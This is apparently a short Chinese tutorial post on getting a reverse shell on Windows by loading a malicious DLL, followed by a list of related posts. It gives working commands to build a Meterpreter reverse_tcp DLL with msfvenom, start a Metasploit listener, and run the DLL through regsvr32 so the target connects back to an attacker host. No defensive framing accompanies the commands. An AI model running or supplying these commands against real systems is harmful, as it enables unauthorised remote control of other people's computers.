加载dll文件反弹shell
第一步:生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll
第二步:启动MSF等待回连
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.106.10 set LPORT 443 run
第三步:加载dll文件
# 建议加上 /s 和 /u 参数 regsvr32.exe /s /u reverse_tcp.dll
成功反弹shell后在进程列表中会出现rundll32.exe进程,如果退出meterpreter会话则进程消失。
相关推荐
tianhuak 2020-11-24
huha 2020-10-16
lianshaohua 2020-09-23
laisean 2020-11-11
zhangjie 2020-11-11
大牛牛 2020-10-30
firefaith 2020-10-30
liguojia 2020-10-20
wangzhaotongalex 2020-10-20
以梦为马不负韶华 2020-10-20
CARBON 2020-10-20
彼岸随笔 2020-10-20
lianshaohua 2020-10-20
yutou0 2020-10-17
JohnYork 2020-10-16
xiaonamylove 2020-10-16
Julyth 2020-10-16
applecarelte 2020-10-16
ourtimes 2020-10-16